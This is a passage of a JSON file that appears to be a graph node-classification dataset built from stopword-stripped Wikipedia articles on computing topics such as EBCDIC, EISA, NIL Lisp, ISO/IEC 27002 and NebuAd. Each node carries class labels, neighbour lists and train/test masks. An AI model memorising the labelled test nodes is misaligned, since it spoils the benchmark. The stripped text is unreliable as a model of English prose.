    "text": "Paul_Irish:paul irish paul irish american front-end engineer developer advocate google chrome web browser widely recognized thought leader leading evangelist web technologies including javascript css 2011 named developer year net awards contributions web development landscape participation many popular open source projects irish created contributed led development many front-end web development projects javascript libraries irish created key contributor many websites effort encourage browser web developers move html5",
    "neighbors": [
      5067,
      3462,
      119
    ],
    "mask": "Train"
  },
  {
    "node_id": 3439,
    "label": 6,
    "text": "Arla_(file_system):arla file system arla implementation afs distributed file system developed royal institute technology stockholm arla started björn grönvall 1993 assar westerlund johan danielsson joined project shortly thereafter project died usable fall 1997 project restarted starting björn implementation rxkad assar ported xfs arla component confused xfs filesystem freebsd love hörnqvist-åstrand began working followed magnus ahltorp working linux kernel module artur grabowski working openbsd kernel module today arla afs client support openbsd freebsd netbsd linux solaris tru64 mac os x windows support way delayed insufficient windows knowledge experimental afs server available yet considered stable",
    "neighbors": [
      3826,
      2395,
      6797,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 3440,
    "label": 4,
    "text": "Graham-Denning_model:graham-denning model graham-denning model computer security model shows subjects objects securely created deleted also addresses assign specific access rights mainly used access control mechanisms distributed systems three main parts model set subjects set objects set eight rules subject may process user makes request access resource object resource user process wants access model addresses security issues associated define set basic rights specific subjects execute security functions object model eight basic protection rules actions outline moreover object owner special rights subject another subject controller special rights model based access control matrix model rows correspond subjects columns correspond objects subjects element contains set rights subject object j subject subject k. example action contains rights subject object example execute executing one 8 rules example creating object matrix changed new column added object subject created becomes owner rule associated precondition example subject x wants delete object must owner x contains 'owner right harrison-ruzzo-ullman extended model defining system protection based commands made primitive operations conditions",
    "neighbors": [
      3360,
      3616,
      4583,
      3480,
      3417,
      10170
    ],
    "mask": "None"
  },
  {
    "node_id": 3441,
    "label": 3,
    "text": "University_of_New_Hampshire_InterOperability_Laboratory:university new hampshire interoperability laboratory university new hampshire interoperability laboratory unh-iol independent test facility provides interoperability standards conformance testing networking telecommunications data storage consumer technology products founded 1988 employs approximately 25 full-time staff members 100 part-time undergraduate graduate students counts 150 companies members unh-iol began project university research computing center rcc 1988 rcc testing fiber distributed data interface fddi equipment intention deploying network rcc found equipment two vendors work together contacted vendors find solution two vendors cooperated rcc solve problem caused differences draft final fddi specification time period rcc testing 10base-t ethernet interfaces another project university recognized need interoperability testing networking equipment also opportunity provide students hands-on experience emerging technologies idea providing testing services companies vendor-neutral environment first unh-iol consortium 10base-t ethernet founded 1990 next decade unh-iol grew twelve consortia 100 member companies 2002 outgrown several smaller locations unh-iol moved 32,000 square foot facility outskirts unh campus one area unh-iol influential ipv6 standardization deployment 2003 2007 unh-iol organized moonv6 project multi-site ipv6 based network designed test interoperability ipv6 implementations time moonv6 project largest permanently deployed multi-vendor ipv6 network world unh-iol also north american laboratory offering iso/iec 17025 accredited testing designed specifically usgv6 test program unh-iol also known organizing hosting plugfests number industry trade organizations lab hosted plugests broadband forum nvm express scsi trade association ethernet alliance open compute project among others 2013 unh-iol awarded ieee-sa corporate award outstanding corporate leadership contribution ieee-sa january 2016 lab moved new 28,000 square foot location adjacent main unh campus durham nh unh-iol operates testing programs annual membership basis called consortia consortium collaboration equipment vendors test equipment manufacturers industry forums unh-iol particular technology collaborative testing model intended distribute costs associated maintaining high-quality testing program among consortium members unh-iol currently administers consortia 20 different technologies including",
    "neighbors": [
      6724,
      4396,
      7863,
      2904,
      7258,
      3868,
      5470
    ],
    "mask": "None"
  },
  {
    "node_id": 3442,
    "label": 9,
    "text": "Curl_(programming_language):curl programming language curl reflective object-oriented programming language interactive web applications whose goal provide smoother transition formatting programming makes possible embed complex objects simple documents without needing switch programming languages development platforms curl implementation initially consisted interpreter compiler added later curl combines text markup html scripting javascript heavy-duty computing java c c++ within one unified framework used range internal enterprise b2b b2c applications curl programs may compiled curl applets viewed using curl rte runtime environment plugin web browsers currently supported microsoft windows linux macos curl supports detached applets web deployed applet runs user desktop independent browser window much silverlight 3 adobe air curl language attempts address long-standing problem different building blocks make modern web document often require wildly different methods implementation different languages different tools different frameworks often completely different teams final — often difficult — hurdle getting blocks communicate consistent manner curl attempts side-step problems providing consistent syntactic semantic interface levels web content creation simple html complex object-oriented programming curl markup language like html—that plain text shown text time curl includes object-oriented programming language supports multiple inheritance curl applications required observe separation information style behavior html cascading style sheets css javascript imposed although style programming used curl desired curl language used html replacement presenting formatted text abilities range way compiled strongly typed object-oriented system programming language authoring html-level programming constructs curl extended user code language designed curl applications compiled native code client machine just-in-time compiler run high speed curl applets also written run off-line disconnected network occasionally connected computing fact curl ide application written curl simple curl applet helloworld might code run user least one curl versions 7.0 8.0 installed curl provides macros text-procedures addition anonymous procedures named methods alternative using text-procedure paragraph would recently style layout adopted builders groovy language jvm also familiar users css tcl/tk features web applications implemented combinations javascript libraries html css already found within curl language including features usually associated prototype script.aculo.us accordion panes curl sets callbacks manner also adopted groovy curl comments use vertical bar several variations simplest follows curl provides user-defined text procedures stylesheets curl used readily domain-specific lightweight markup major advantage plain text html markup text encoding set e.g. utf-8 text entered unicode-enabled editor without escaping characters like javascript curl unicode friendly poetry example would initially implemented defining poem stanza markup paragraph text formats stanza could refined include hidden navigation anchor page navigation using curl destination text procedure markup used different results one style text visible one context invisible another curl also permits top-level file inclusion source text markup included different parent files education example one could create source file test questions include student teacher version text",
    "neighbors": [
      9345,
      3462,
      6797,
      1551,
      8609,
      11559,
      5546,
      5677,
      7983,
      10033,
      823,
      6074,
      963,
      10819,
      8262,
      3285,
      4822,
      8923,
      4069,
      6502,
      9701,
      5612,
      8430,
      9841,
      2557
    ],
    "mask": "None"
  },
  {
    "node_id": 3443,
    "label": 2,
    "text": "EBCDIC:ebcdic extended binary coded decimal interchange code ebcdic eight-bit character encoding used mainly ibm mainframe ibm midrange computer operating systems descended code used punched cards corresponding six-bit binary-coded decimal code used ibm computer peripherals late 1950s early 1960s supported various non-ibm platforms fujitsu-siemens bs2000/osd os-iv msp msp-ex sds sigma series unisys vs/9 burroughs mcp icl vme ebcdic devised 1963 1964 ibm announced release ibm system/360 line mainframe computers eight-bit character encoding developed separately seven-bit ascii encoding scheme created extend existing binary-coded decimal bcd interchange code bcdic devised efficient means encoding two zone number punches punched cards six bits distinct encoding using position 2 instead 1 maintained punched cards desirable hole punches close ensure integrity physical card ibm chief proponent ascii standardization committee company time prepare ascii peripherals card punch machines ship system/360 computers company settled ebcdic system/360 became wildly successful together clones rca spectra 70 icl system 4 fujitsu facom thus ebcdic ibm mainframe midrange peripherals operating systems use ebcdic inherent encoding toleration ascii example ispf z/os browse edit ebcdic ascii encoded files software many hardware peripherals translate encodings modern mainframes ibm zseries include processor instructions hardware level accelerate translation character sets ebcdic-oriented unicode transformation format called utf-ebcdic proposed unicode consortium designed allow easy updating ebcdic software handle unicode intended used open interchange environments even systems extensive ebcdic support popular example z/os supports unicode preferring utf-16 specifically z/os limited support utf-ebcdic ibm aix running rs/6000 descendants including ibm power systems linux running z systems operating systems running ibm pc descendants use ascii aix/370 aix/390 running system/370 system/390 mainframes fact code points different less problem inter-operating ascii fact sorting ebcdic put lowercase letters uppercase letters letters numbers exactly opposite ascii programming languages file formats network protocols designed ascii quickly made use available punctuation marks curly braces exist ebcdic making translation ebcdic ambiguous also prevented various attempts make internationalized versions ascii also replaced punctuation marks letters gaps letters made simple code worked ascii fail ebcdic example codice_1 would set codice_2 26 letters ascii alphabet 41 characters including number unassigned ones ebcdic fixing required complicating code function calls greatly resisted programmers using eight bits ebcdic may encouraged use eight-bit byte ibm ascii likely adopted systems 36 bits five seven-bit ascii characters fit one word eight-bit bytes became widespread ascii systems sometimes used unused bit purposes metacharacters mark borders records words made difficult change code work ebcdic pdp-11 bytes high bit set treated negative numbers behavior copied c causing unexpected problems ebcdic problems also hindered adoption extended ascii character sets table shows invariant subset ebcdic characters assignments ebcdic code pages also shows gray missing ascii ebcdic punctuation located ccsid 037 one code page variants ebcdic unassigned codes typically filled international region-specific characters various ebcdic code page variants characters gray often moved around swapped well table cell first row abbreviation control code printable characters character second row unicode code blank controls n't exist unicode open-source software advocate software developer eric s. raymond writes jargon file ebcdic loathed hackers meant members subculture enthusiastic programmers jargon file 4.4.7 gives following definition ebcdic design also source many jokes one joke went references ebcdic character set made classic infocom adventure game series zork machine room zork ii ebcdic used imply incomprehensible language",
    "neighbors": [
      5888,
      5384,
      3594,
      10508,
      909,
      7053,
      11151,
      7188,
      2078,
      421,
      10235,
      10108,
      7983,
      1841,
      11059,
      5557,
      3642,
      10426,
      9920,
      577,
      7364,
      73,
      1610,
      8138,
      7504,
      11217,
      5714,
      1235,
      11218,
      4565,
      10072,
      10585,
      863,
      479,
      10474,
      3563,
      625,
      2168,
      9977,
      3323,
      3708,
      2045,
      11006
    ],
    "mask": "Test"
  },
  {
    "node_id": 3444,
    "label": 5,
    "text": "Internet_Group_Management_Protocol_with_Access_Control:internet group management protocol access control internet group management protocol access control igmp-ac designed incorporating aaa protocol functionality existing ip multicast model enforce authentication authorization end user receiver joining leaving secured multicast group add aaa functionality access router one-hop router receiver act network access server nas igmp-ac extended version internet group management protocol provides generic client-server authentication protocol receiver end user act client aaa server act server access router one-hop router receiver perform forwarding task thus suitable authentication protocol e.g. extensible authentication protocol eap client-server entities encapsulated igmp-ac architecture igmp-ac disrupt usual function igmpv3 used classical multicast group access control mechanism igmp-ac take place join/leave secured restricted multicast group",
    "neighbors": [
      2737,
      1411,
      2509
    ],
    "mask": "None"
  },
  {
    "node_id": 3445,
    "label": 3,
    "text": "Extended_Industry_Standard_Architecture:extended industry standard architecture extended industry standard architecture practice almost always shortened eisa frequently pronounced eee-suh bus standard ibm pc compatible computers announced september 1988 consortium pc clone vendors gang nine counter ibm use proprietary micro channel architecture mca ps/2 series comparison bus –which gang nine retroactively renamed isa bus avoid infringing ibm trademark pc/at computer– eisa extended 32 bits allows one cpu share bus bus mastering support also enhanced provide access 4 gb memory unlike mca eisa accept older xt isa boards — lines slots eisa superset isa eisa much favoured manufacturers due proprietary nature mca even ibm produced machines supporting somewhat expensive implement though much mca never became particularly popular desktop pcs however reasonably successful server market better suited bandwidth-intensive tasks disk access networking eisa cards produced either scsi network cards eisa also available non-ibm compatible machines alphaserver hp 9000-d sgi indigo2 mips magnum time strong market need bus speeds capabilities desktop computers vesa local bus later pci filled niche eisa vanished obscurity original ibm pc included five 8-bit slots running system clock speed 4.77 mhz pc/at introduced 1984 three 8-bit slots five 16-bit slots running system clock speed 6 mhz earlier models 8 mhz last version computer 16-bit slots superset 8-bit configuration 8-bit cards able plug 16-bit slot cards used skirt design physically interfered extended portion slot continue run 8-bit mode one key reasons success ibm pc pc clones followed active ecosystem third-party expansion cards available machines ibm restricted patenting bus widely published bus specifications pc-clone industry continued build momentum mid- late-1980s several problems bus began apparent first slot known time managed central standards group nothing prevent manufacturer pushing standard one common issues pc clones became common pc manufacturers began ratcheting processor speed maintain competitive advantage unfortunately isa bus originally locked processor clock meant 286 machines isa buses ran 10 12 even 16 mhz fact first system clock isa bus 8 mhz turbo 8088 clones clocked processors 8 mhz caused many issues incompatibility true ibm-compatible third-party card designed 8 mhz 4.77 mhz bus might work higher speed system even worse would work unreliably pc makers eventually decoupled slot clock system clock still standards body police industry companies like dell modified bus design architecture well entrenched single clone manufacturer leverage create standardized alternative compelling reason cooperate new standard first 386-based system compaq deskpro 386 hit market 1986 still supported 16-bit slots 386 pcs followed suit later isa bus remained part systems even late 1990s meanwhile ibm began worry losing control industry created 1987 ibm released ps/2 line computers included mca bus mca included numerous enhancements 16-bit bus including bus mastering burst mode software configurable resources 32-bit capabilities however effort reassert dominant role ibm patented bus placed stringent licensing royalty policies use manufacturers produce licensed mca machines notably ncr overall industry balked ibm restrictions steve gibson proposed clone makers adopt nubus instead group gang nine led compaq created new bus named extended enhanced industry standard architecture eisa 16-bit bus became known industry standard architecture isa provided virtually technical advantages mca remaining compatible existing 8-bit 16-bit cards enticing system card makers minimal licensing cost eisa bus slot two-level staggered pin system upper part slot corresponding standard isa bus pin layout additional features eisa bus implemented lower part slot connector using thin traces inserted insulating gap upper isa card card edge connector additionally lower part bus five keying notches isa card unusually long traces accidentally extend lower part slot intel introduced first eisa chipset also first chipset modern sense word 82350 september 1989 intel introduced lower cost variant 82350dt announced april 1991 began shipping june year first eisa computer announced hp vectra 486 october 1989 first eisa computers hit market compaq deskpro 486 systempro systempro one first pc-style systems designed network server built ground take full advantage eisa bus included features multiprocessing hardware raid bus-mastering network cards one benefits come eisa standard final codification standard isa slots cards held particular clock speed fixed industry standard 8.33 mhz thus even systems n't use eisa bus gained advantage isa standardized contributed longevity gang nine informal name given consortium personal computer manufacturing companies together created eisa bus rival members generally acknowledged compaq leadership one stating 1989 within gang nine 10 people sit table write letter president someone write letter compaq sitting typewriter members although mca bus slight performance advantage eisa bus speed 10 mhz compared 8.33 mhz eisa contained almost technological benefits mca boasted including bus mastering burst mode software configurable resources 32-bit data/address buses brought eisa nearly par mca performance standpoint eisa easily defeated mca industry support eisa replaced tedious jumper configuration common isa cards software-based configuration every eisa system shipped eisa configuration utility usually slightly customized version standard utilities written eisa chipset makers user would boot utility either floppy disk dedicated hard drive partition utility software would detect eisa cards system could configure hardware resources interrupts memory ports etc eisa card eisa card would include disk information described available options card eisa system motherboard user could also enter information isa cards system allowing utility automatically reconfigure eisa cards avoid resource conflicts similarly windows 95 plug-and-play capability able change configuration eisa cards could detect cards read configuration reconfigure plug play hardware avoid resource conflicts windows 95 would also automatically attempt install appropriate drivers detected eisa cards eisa success far guaranteed many manufacturers including gang nine researched possibility using mca example compaq actually produced prototype deskpro systems using bus however never put production clear mca lost compaq allowed mca license expire license actually cost relatively little primary costs associated mca industry revolted royalties paid per system shipped hand became clear ibm micro channel dying ibm licensed eisa use server systems",
    "neighbors": [
      1400,
      4228,
      5384,
      9742,
      274,
      408,
      799,
      2723,
      8355,
      6187,
      11051,
      7215,
      8625,
      5312,
      3142,
      6854,
      3272,
      10833,
      9686,
      2525,
      5225,
      1515,
      11627,
      8301,
      6510,
      7151,
      1776,
      6128,
      6129,
      5368,
      9723,
      5756
    ],
    "mask": "None"
  },
  {
    "node_id": 3446,
    "label": 9,
    "text": "NIL_(programming_language):nil programming language new implementation lisp nil programming language dialect language lisp developed massachusetts institute technology mit intended successor language maclisp 32-bit implementation part response digital equipment corporation dec vax computer project headed jon l white stated goal maintaining compatibility maclisp fixing many problems lisp language invented 1958 john mccarthy massachusetts institute technology mit inception lisp closely connected artificial intelligence ai research community especially pdp-10 systems 36-bit word size pdp-6 pdp-10 influenced usefulness two lisp 18-bit pointers one word pdp-6 project started early 1963 24-bit machine grew 36 bits lisp design goal lisp used implementation programming language micro planner foundation famous ai system shrdlu lisp particular maclisp named originated mit project mac also used implement macsyma computer algebra system 1970s ai research spawned commercial offshoots performance extant lisp systems became growing problem partly garbage collection lisp would use stop-and-copy garbage collection single heap memory allocation partly representation internal structures lisp became difficult run memory-limited stock computer hardware day led creating lisp machines dedicated hardware running lisp environments programs alternative use powerful commodity hardware becoming available especially digital equipment corporation dec vax nil implementation lisp developed mit mid late 1970s intended modern successor maclisp able run stock hardware contrast lisp machine lisp lisp machines originally designed first modern lisp dialect stock hardware development lisp machine lisp mit went become one main influences design common lisp pg 63/294 since users macsyma program represented large potential user base nil necessary nil would large complex system speed would imperative example high-speed bignums requirement support macsyma since nil would failure slow bignums consequently nil ended large base vax assembly language requirements led aggressive complex optimization strategy applied prematurely negative results final system concurrent effort write nil research group stanford university lawrence livermore national laboratory headed richard p. gabriel investigating design lisp run s-1 mark iia supercomputer s-1 lisp lisp never fully functional test bed implementing advanced compiler methods lisp eventually s-1 nil groups began collaborating although unsuccessful meeting goals used language nil important several ways first brought together jon l. white guy l. steele jr. richard p. gabriel later define common lisp second jonathan rees worked part nil project year away yale university returning yale hired computer science department write new lisp became optimizing native code scheme system named t. part nil begat name since nil",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      2135,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      1147,
      7805,
      9345,
      1159,
      9865,
      9877,
      4774,
      5803,
      2225,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      7889,
      5852,
      10463,
      7392,
      1249,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1804,
      1301,
      791,
      8474,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      1480,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "Test"
  },
  {
    "node_id": 3447,
    "label": 4,
    "text": "ISO/IEC_27002:iso/iec 27002 iso/iec 27002 information security standard published international organization standardization iso international electrotechnical commission iec titled information technology – security techniques – code practice information security controls iso/iec 27000-series standards descended corporate security standard donated shell uk government initiative early 1990s shell standard developed british standard bs 7799 mid-1990s adopted iso/iec 17799 2000 iso/iec standard revised 2005 renumbered iso/iec 27002 2007 align iso/iec 27000-series standards revised 2013 iso/iec 27002 provides best practice recommendations information security controls use responsible initiating implementing maintaining information security management systems isms information security defined within standard context cia triad standard starts 5 introductory chapters followed 14 main chapters within chapter information security controls objectives specified outlined information security controls generally regarded best practice means achieving objectives controls implementation guidance provided specific controls mandated since organizations implement wide range information security-related controls many recommended general terms iso/iec 27002 structuring information security controls infrastructure accordance iso/iec 27002 may advantageous since examples typical information security policies controls relating three parts iso/iec 27002 note merely illustration list example controls incomplete universally applicable iso/iec 27002 directly equivalent national standards several countries translation local publication often results several months delay main iso/iec standard revised released national standard bodies go great lengths ensure translated content accurately completely reflects iso/iec 27002 iso/iec 27002 advisory standard meant interpreted applied types sizes organization according particular information security risks face practice flexibility gives users lot latitude adopt information security controls make sense makes unsuitable relatively straightforward compliance testing implicit formal certification schemes iso/iec 27002 revised iso/iec jtc1/sc27 every years order keep current relevant revision involves instance incorporating references issued security standards iso/iec 27000 iso/iec 27004 iso/iec 27005 various good security practices emerged field since last published due significant 'installed base organizations already using iso/iec 27002 particularly relation information security controls supporting isms complies iso/iec 27001 changes justified wherever possible evolutionary rather revolutionary nature",
    "neighbors": [
      10752,
      5636,
      9607,
      1934,
      399,
      8462,
      5010,
      8854,
      5373,
      11036,
      5149,
      2206,
      9245,
      5413,
      8613,
      7979,
      10413,
      6062,
      11567,
      11056,
      433,
      6834,
      8627,
      8881,
      3126,
      1079,
      5816,
      316,
      62,
      6977,
      10307,
      4936,
      8904,
      1610,
      9290,
      8524,
      2519,
      2904,
      6105,
      4058,
      6360,
      7898,
      10717,
      3552,
      4064,
      4448,
      357,
      8421,
      1897,
      8426,
      2030,
      5614,
      1010,
      2045,
      10238,
      383
    ],
    "mask": "None"
  },
  {
    "node_id": 3448,
    "label": 9,
    "text": "Advanced_Continuous_Simulation_Language:advanced continuous simulation language advanced continuous simulation language acsl pronounced axle computer language designed modeling evaluating performance continuous systems described time-dependent nonlinear differential equations like simcos tutsim acsl dialect continuous system simulation language cssl originally designed simulation councils inc sci 1967 attempt unify continuous simulations field acsl equation-oriented language consisting set arithmetic operators standard functions set special acsl statements macro capability allows extension special acsl statements acsl intended provide simple method representing mathematical models digital computer working equation description problem block diagram user writes acsl statements describe system investigation important feature acsl sorting continuous model equations contrast general purpose programming languages fortran program execution depends critically statement order applications acsl new areas developed constantly typical areas acsl currently applied include control system design aerospace simulation chemical process dynamics power plant dynamics plant animal growth toxicology models vehicle handling microprocessor controllers robotics acslx family products aegis technologies group inc modular modeling system mms nhance technologies inc",
    "neighbors": [
      3104,
      3960,
      8262
    ],
    "mask": "Test"
  },
  {
    "node_id": 3449,
    "label": 7,
    "text": "Comparison_of_cluster_software:comparison cluster software following tables compare general technical information notable computer cluster software software grossly separated four categories job scheduler nodes management nodes installation integrated stack table explanation table explanation",
    "neighbors": [
      9602,
      6797,
      1806,
      5397,
      2710,
      7318,
      1185,
      5414,
      3753,
      9137,
      823,
      5956,
      2254,
      4052,
      11353,
      3678,
      10597,
      5223,
      8554,
      875,
      5492,
      3323,
      2045,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 3450,
    "label": 3,
    "text": "Failover:failover computing related technologies networking failover switching redundant standby computer server system hardware component network upon failure abnormal termination previously active application server system hardware component network failover switchover essentially operation except failover automatic usually operates without warning switchover requires human intervention systems designers usually provide failover capability servers systems networks requiring near-continuous availability high degree reliability server level failover automation usually uses heartbeat system connects two servers either using separate cable example rs-232 serial ports/cable network connection long regular pulse heartbeat continues main server second server second server bring systems online may also third spare parts server running spare components hot switching prevent downtime second server takes work first soon detects alteration heartbeat first machine systems ability send notification failover certain systems intentionally failover entirely automatically require human intervention automated manual approval configuration runs automatically human approved failover failback process restoring system component service previously state failure back original working state standby system go functioning back standby use virtualization software allowed failover practices become less reliant physical hardware process referred migration running virtual machine moved one physical host another little disruption service term failover although probably use engineers much earlier found 1962 declassified nasa report term switchover found 1950s describing hot cold standby systems current meaning immediate switchover running system hot delayed switchover system needs starting cold conference proceedings 1957 describes computer systems emergency switchover i.e failover scheduled failover maintenance",
    "neighbors": [
      2944,
      9990,
      903,
      7049,
      8338,
      3219,
      1049,
      154,
      1307,
      929,
      8233,
      3757,
      2222,
      10681,
      4026,
      6591,
      9919,
      5825,
      11203,
      1606,
      1223,
      1990,
      1993,
      970,
      9677,
      4435,
      3927,
      3931,
      2395,
      8670,
      2913,
      1891,
      10340,
      5093,
      7016,
      4074,
      10733,
      6514,
      6003,
      9844,
      7802,
      6014
    ],
    "mask": "Test"
  },
  {
    "node_id": 3451,
    "label": 3,
    "text": "Stanford_MIPS:stanford mips mips acronym microprocessor without interlocked pipeline stages research project conducted john l. hennessy stanford university 1981 1984 mips investigated type instruction set architecture isa called reduced instruction set computer risc implementation microprocessor large scale integration vlsi semiconductor technology effective exploitation risc architectures optimizing compilers mips together ibm 801 berkeley risc three research projects pioneered popularized risc technology mid-1980s recognition impact mips made computing hennessey awarded ieee john von neumann medal 2000 ieee shared david a. patterson eckert–mauchly award 2001 association computing machinery seymour cray computer engineering award 2001 ieee computer society david patterson turing award 2017 acm project initiated 1981 response reports similar projects ibm 801 university california berkeley risc mips conducted hennessy graduate students conclusion 1984 hennessey founded mips computer systems year commercialize technology developed project 1985 mips computer systems announced new isa also called mips first implementation r2000 microprocessor commercial mips isa implementations went widely used appearing embedded computers personal computers workstations servers supercomputers may 2017 commercial mips isa owned imagination technologies used mainly embedded computers late 1980s follow-up project called mips-x conducted hennessy stanford mips isa based 32-bit word supported 32-bit addressing word-addressed load/store architecture—all references memory used load store instructions copied data main memory 32 general-purpose registers gprs instructions integer arithmetic operated gprs possessed basic instruction set consisting instructions control flow integer arithmetic logical operations minimize pipeline stalls instructions except load store executed one clock cycle instructions integer multiplication division operations floating-point numbers architecture exposed hazards caused five-stage pipeline delay slots compiler scheduled instructions avoid hazards resulting incorrect computation whilst simultaneously ensuring generated code minimized execution time mips instructions 16 32 bit long decision expose hazards motivated desire maximize performance minimizing critical paths interlock circuits lengthened instructions packed 32-bit instruction words mips word-addressed 32-bit instruction word could contain two 16-bit operations included reduce size machine code mips microprocessor implemented nmos logic",
    "neighbors": [
      4098,
      8450,
      8327,
      8711,
      783,
      1298,
      5267,
      7445,
      409,
      9371,
      4124,
      8861,
      9851,
      10781,
      8481,
      5028,
      3493,
      6311,
      426,
      682,
      938,
      4269,
      7852,
      8237,
      2224,
      4144,
      9003,
      9391,
      1462,
      2620,
      7234,
      6979,
      6084,
      3014,
      3142,
      1480,
      10316,
      6607,
      2517,
      7770,
      1376,
      6247,
      10985,
      6250,
      6252,
      6253,
      5358,
      9964,
      6256,
      8048,
      8944,
      757,
      5237,
      2039,
      760,
      249,
      3323,
      8700,
      1399
    ],
    "mask": "Train"
  },
  {
    "node_id": 3452,
    "label": 4,
    "text": "NebuAd:nebuad nebuad american online advertising company based redwood city california offices new york london funded investment companies sierra ventures menlo ventures one several companies originally developed behavioral targeting advertising systems sought deals isps enable analyse customer websurfing habits order provide relevant micro-targeted advertising phorm similar company operating europe adzilla project rialto also appear developing similar systems one point nebuad signed 30 customers mostly internet access providers agreements providers covered 10 percent broadband users america due fallout following public congressional concern nebuad largest isp customers pulled nebuad closed business uk august 2008 followed us may 2009 nebuad uk ltd dissolved february 2010 nebuad platform comprised three main parts hardware hosted within isp capable inserting content pages off-site server complex analyse categorise contents users internet communications relationships advertising networks willing present nebuad targeted advertising system consisted hardware device installed within isp client network device capable monitoring 50,000 users users could opt-out nebuad ’ information collection targeted ads way users prevent isps sending data nebuad first place since isps route customers traffic important vantage point monitor traffic to-and-from consumer using deep packet inspection dpi analysing traffic nebuad reported gained information customers particular interests less intrusive methods nebuad privacy policy claimed specifically store use information relating confidential medical information racial ethnic origins religious beliefs sexuality tied personally identifiable information 'sensitive personal information also advises information collect stored processed nebuad servers united states result information may subject access requests governments courts law enforcement least 2 customers middle america isp wow noticed unexpected cookies appearing sites nebuad.adjuggler.com using google read written wow support department contacted wow initially denied responsibility activity noticing problems google loading slowly creation non-google cookies one customer spent hours trying disinfect machine incorrectly thought infected spyware proved ineffective resorted reinstalling machine os scratch discover problem go away july 9 2008 wow suspended use nebuad services subscribers according nebuad sales less 1 users opt-out one isp expected earn least 2.50 per month user nebuad bought impressions ad networks including valueclick nebuad argued behavioral targeting enriches internet several fronts firstly website owners offered improved click-through rate ctr could increase profits reduce amount page-space dedicated advertising owners previously thought ad-unfriendly websites offered chance make money subject matter website interests visitors advertisers offered better targeted adverts hence reducing scattergun approach publishing many ads possible hope catching client users offered relevant adverts isps paid allowing nebuad access network per-user per-active profile basis nebuad used data web search terms page views page ad clicks time spent specific sites zip code browser info connection speed categorise user interests nebuad access user identification information isp may able discover traffic monitoring example email traffic may tie email address ip address bob dykes nebuad ceo claimed 2008 800 consumer interest segments today 're expanding multiple thousands generally nebuad provided additional revenue network operators may maintain lower consumers internet access bills critics dpi targeted advertising believe raw content internet communications entrusted isp handling without inspected modified sale privacy advocates criticize lack disclosure isps provided prior partnering nebuad weak opt-out method lack oversight third-party company contents internet communications conflicts united states wiretap laws company refusal name partner isps february 2008 one american cable operator wide open west wow started rolling nebuad roll-out completed first week march 2008 wow updated terms conditions include mention nebuad cases informed customers terms updated however customers explicitly notified nebuad later sometime third week march 2008 response inquiry members united states house representatives telecommunications subcommittee pilot test nebuad services embarq said notified consumers revising privacy policy 2 weeks prior sending users data streams nebuad knology user knoxville tennessee reported notified internet use monitored may 2008 charter communications announced planned monitor websites visited customers via partnership nebuad customers voiced concerns charter changed mind june plans implement nebuad agree isp employees including one employee planned re-route traffic avoid nebuad deep packet inspection hardware altogether members us congress ed markey chairman house subcommittee telecommunications internet joe barton ranking member house committee energy commerce argued services must opt-in comply provisions laid section 631 us communications act wrote charter request suspend test respectfully request move forward charter communications proposed venture nebuad opportunity discuss issues raised proposed venture writer wired news questioned whether charter users could really opt monitored able opt receiving targeted ads writer asked would breach anti-wiretapping laws engineer examined system confirmed way opt nebuad monitoring inbound outbound information intercepted sent nebuad offsite server processed even user opted service prevent isp sending data nebuad report robert m. topolski chief technology consultant free press public knowledge showed nebuad devices created cookies end-users machines injecting specious packet end data stream returned response web page requests submitted search engines including google yahoo content specious packet would added end web page rendered end-user browser contained html script tags cause browser request javascript http //a.faireagle.com critics concerned nebuad superimposed advertising ads advertisers placing additional advertising page concerns originated nebuad fair eagle operation patent application data mentioned inventions loose relationship claria corporation whose products history suggest tactics well following 2007 reported redmoon texas-based isp using nebuad technology inject redmoon advertising pages visited users fair eagle advertisement hardware provided nebuad inserted additional advertising alongside content web pages ads featured window fair eagle title bar injected ads stopped appearing toward end june 2007 senior staff members nebuad worked previously defunct ad company named claria corporation formerly gator corporation well known ad software known gator claria nebuad located redwood city california june 2006 creation nebuad.com coincides timing claria decision shut gator service nebuad repeatedly denied corporate connection claria describing hiring claria employees result company shedding employees tight market experienced advertising sales staff valley isps tried deployed prepared deploy nebuad included following following isps listed legal documents related class action notice see deployed nebuad hardware isps ended suspended relationship nebuad nebuad closed uk august 2008 us may 2009 proposed settlement class-action lawsuit nebuad underway october 2011 subscribers isps listed january 1 2007 july 1 2008 considered mandatory class members opt could choose opt terms proposed settlement nebuad would create settlement fund approximately 2,410,000 used administration settlement covering legal fees incentive award 5,000 individual brought complaint providing 1000 named representatives money going support non-profits providing consumer education privacy research",
    "neighbors": [
      9168,
      10417,
      4732
    ],
    "mask": "Test"
  },
  {
    "node_id": 3453,
    "label": 3,
    "text": "VESA_Plug_and_Display:vesa plug display vesa plug display p video connector digital monitors flat panel displays video projectors ratified vesa introduced around time dfp marketed replacement vesa enhanced video connector extension dvi unlike dvi never achieved widespread implementation p connector shares pin layout vesa evc pins assigned carrying analogue audio video signals reused carry digital video signals basic p line carries single-link tmds digital video signal max 160 mhz supports vesa display data channel version 2 analogue video signals supported must capable carrying least 150 mhz bandwidth usb version specified supported would intended contemporary usb standards usb connector intended passing mouse movements projector wireless remote computer presentation software firewire supported must compliant ieee 1394-1995 specification although pin layout comes vesa evc connector shell slightly different p d-a/d compatible evc device except missing vesa evc features p d-d addition regular p connector standard also specifies 40-pin microribbon connector defined making digital video connection articles register sometimes mistake p port alternative form apple display connector adc carries higher current different pin layout support firewire",
    "neighbors": [
      9057,
      7594,
      10954,
      6575,
      11631,
      4567,
      7647
    ],
    "mask": "None"
  },
  {
    "node_id": 3454,
    "label": 1,
